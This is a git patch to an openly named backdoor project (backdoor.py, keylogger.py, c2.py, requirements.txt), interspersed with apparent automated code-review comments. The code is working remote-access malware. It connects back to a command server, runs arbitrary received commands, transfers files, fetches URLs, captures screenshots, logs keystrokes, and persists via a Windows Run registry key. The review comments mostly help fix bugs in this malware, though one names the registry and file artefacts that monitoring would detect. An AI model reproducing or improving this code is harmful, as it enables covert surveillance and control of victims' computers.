From 9dd0a57ddea6ee3de064e6156ef1b7b5a1ec4b68 Mon Sep 17 00:00:00 2001 From: Zepher Ashe Date: Tue, 9 Aug 2022 10:18:25 +0100 Subject: [PATCH] Add files via upload --- backdoor/backdoor.py | 61 +++++++++++++++++++++++++++++---------- backdoor/keylogger.py | 7 ++++- backdoor/requirements.txt | 9 ++++++ c2.py | 11 +++++-- 4 files changed, 68 insertions(+), 20 deletions(-) create mode 100644 backdoor/requirements.txt diff --git a/backdoor/backdoor.py b/backdoor/backdoor.py index ad44b4d..db2a124 100644 --- a/backdoor/backdoor.py +++ b/backdoor/backdoor.py @@ -3,18 +3,27 @@ import subprocess import time import os -import pyautogui #dependency # pip install pyautogui #mss is faster alternative -import keylogger import threading import shutil import sys -import requests from sys import platform +# External dependencies +from mss import mss +import requests + +# Local dependencies +import keylogger +# from mss import mss # mss v6.1.0 +# import requests # v2.28.0 + + + def reliable_send(data): jsondata = json.dumps(data) s.send(jsondata.encode()) + def reliable_recv(): data = '' while True: @@ -24,6 +33,7 @@ def reliable_recv(): except ValueError: continue + def download_file(file_name): f = open(file_name, 'wb') s.settimeout(2) 
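Review bot: The new import block in backdoor/backdoor.py keeps commented-out duplicates (`# from mss import mss # mss v6.1.0`, `# import requests # v2.28.0`) under the `# Local dependencies` heading, so a reader cannot tell which modules are local and which are third-party. Version notes belong in the manifest; I would delete those two comment lines and leave only `import keylogger` under that heading. As committed, backdoor/requirements.txt (added later in this patch) still pins PyAutoGUI, which this hunk stops importing, and does not list mss, so the manifest and the imports disagree. The same commented-duplicate pattern appears in the keylogger.py hunk (`# from pynput.keyboard import Listener #v1.7.6`).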
@@ -37,32 +47,46 @@ def download_file(file_name): s.settimeout(None) f.close() + def upload_file(file_name): f = open(file_name, 'rb') s.send(f.read()) + def download_url(url): get_response = requests.get(url) file_name = url.split('/')[-1] with open(file_name, 'wb') as out_file: out_file.write(get_response.content) + def screenshot(): - myScreenshot = pyautogui.screenshot() - myScreenshot.save('.screen.png') + if platform == "win32" or platform == "darwin": + with mss() as screen: + filename = screen.shot() + os.rename(filename, '.screen.png') + elif platform == "linux" or platform == "linux2": + with mss(display=":0.0") as screen: + filename = screen.shot() + os.rename(filename, '.screen.png') + +# TODO: screenshot other monitors def persist(reg_name, copy_name): file_location = os.environ['appdata'] + '\\' + copy_name try: if not os.path.exists(file_location): shutil.copyfile(sys.executable, file_location) - subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', shell=True) + subprocess.call( + 'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', + shell=True) reliable_send('[+] Created Persistence With Reg Key: ' + reg_name) else: reliable_send('[+] Persistence Already Exists') except: reliable_send('[-] Error Creating Persistence With The Target Machine') + def is_admin(): global admin if platform == 'win32': 
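Review bot: `persist` and `screenshot` are touched here without any comment recording what they leave on the host, which is the first thing an analyst reading this file needs to know. I would add above `persist`: `# Copies sys.executable to %APPDATA%\<copy_name> and adds a REG_SZ value <reg_name> under HKCU\Software\Microsoft\Windows\CurrentVersion\Run`, and above `screenshot`: `# Writes the capture to .screen.png in the current working directory`. Those two artefacts, a Run-key value whose data points into AppData and a dot-prefixed PNG in the working directory, are also what endpoint and registry monitoring would key on. Separately, the `reg add` literal is an ordinary string containing `\S`, `\M`, `\W`, `\C` and `\R`, which are invalid escape sequences that current Python versions warn about; it should be written as a raw string (`r'reg add HKCU\Software\...'`).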
@@ -72,28 +96,29 @@ def is_admin(): admin = '[!!] User Privileges!' else: admin = '[+] Administrator Privileges!' - elif platform == "linux" or platform == "linux2" or platform == "darwin": + elif platform == "linux" or platform == "linux2" or platform == "darwin": pass - #TO BE DONE + # TO BE DONE + def shell(): while True: command = reliable_recv() if command == 'quit': break - elif command == 'background': #BEGIN + elif command == 'background': # BEGIN pass - elif command == 'help': #ideally to be removed + elif command == 'help': # ideally to be removed pass elif command == 'clear': - pass #END + pass # END elif command[:3] == 'cd ': os.chdir(command[3:]) elif command[:6] == 'upload': download_file(command[7:]) elif command[:8] == 'download': upload_file(command[9:]) - elif command[:3] == 'get': + elif command[:3] == 'get': try: download_url(command[4:]) reliable_send('[+] Downloaded File From Specified URL!') @@ -119,7 +144,8 @@ def shell(): reg_name, copy_name = command[12:].split(' ') persist(reg_name, copy_name) elif command[:7] == 'sendall': - subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) + subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, + stdin=subprocess.PIPE) elif command[:5] == 'check': try: is_admin() @@ -133,11 +159,13 @@ def shell(): except: reliable_send('[-] Failed to start!') else: - execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE) + execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, + stdin=subprocess.PIPE) result = execute.stdout.read() + execute.stderr.read() result = result.decode() reliable_send(result) + def connection(): while True: time.sleep(5) 
@@ -150,6 +178,7 @@ def connection(): break except: connection() - + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -connection() \ No newline at end of file +connection() diff --git a/backdoor/keylogger.py b/backdoor/keylogger.py index 8a02bc4..f1aac2f 100644 --- a/backdoor/keylogger.py +++ b/backdoor/keylogger.py @@ -1,10 +1,15 @@ #Possibly requires Python3.7 import os -from pynput.keyboard import Listener #Dependency # pip install listener import time import threading from sys import platform +# External dependencies +from pynput.keyboard import Listener + +# Local dependencies +# from pynput.keyboard import Listener #v1.7.6 + class Keylogger(): keys = [] count = 0 diff --git a/backdoor/requirements.txt b/backdoor/requirements.txt new file mode 100644 index 0000000..f821913 --- /dev/null +++ b/backdoor/requirements.txt @@ -0,0 +1,9 @@ +# Generated using Pipreqs +# https://pypi.org/project/pipreqs/ + +# pip install pipreqs +# pipreqs /path/to/project + +PyAutoGUI==0.9.53 +pynput==1.7.6 +requests==2.28.0 diff --git a/c2.py b/c2.py index b6f83d2..b339a02 100644 --- a/c2.py +++ b/c2.py @@ -55,11 +55,15 @@ def screenshot(target, count): os.makedirs(directory) f = open(directory + '/screenshot_%d.png' % (count), 'wb') # if target=Linux then #apt-get install scrot target.settimeout(3) - chunk = target.recv(1024) + try: + chunk = target.recv(10485760) # 10MB + except: + pass + while chunk: f.write(chunk) try: - chunk = target.recv(1024) + chunk = target.recv(10485760) except socket.timeout as e: break target.settimeout(None) @@ -134,6 +138,7 @@ def target_communication(target, ip): download_file(target, command[9:]) elif command[:10] == 'screenshot': screenshot(target, count) + count = count + 1 elif command == 'help': server_help_manual() else: 
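Review bot: In c2.py's `screenshot`, the new `try: chunk = target.recv(10485760)` / `except: pass` leaves `chunk` unassigned when the first recv raises (for example on the 3-second timeout set just above), so the following `while chunk:` fails with an UnboundLocalError. On that path the file opened by `f = open(...)` is presumably never closed either, since the close is outside the hunk. The bare `except:` should name the exception and give `chunk` a value, e.g. `except socket.timeout:` followed by `chunk = b''`, matching the `except socket.timeout as e` already used inside the loop. The argument to recv is only an upper bound on a single read, so raising it to 10 MB does not make one call return a whole image; the end of the transfer is still inferred from the timeout. The function starts and ends outside the hunk.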
@@ -243,4 +248,4 @@ def accept_connections(): # TODO: encrypt connection # TODO: Implement a 'pulse' feature between server and backdoor (Keep alive) # This will ensure if server.py crashes the backdoor will after 60s will realise server is not listen on socket -# and will attempt to run connection() function again. \ No newline at end of file +# and will attempt to run connection() function again.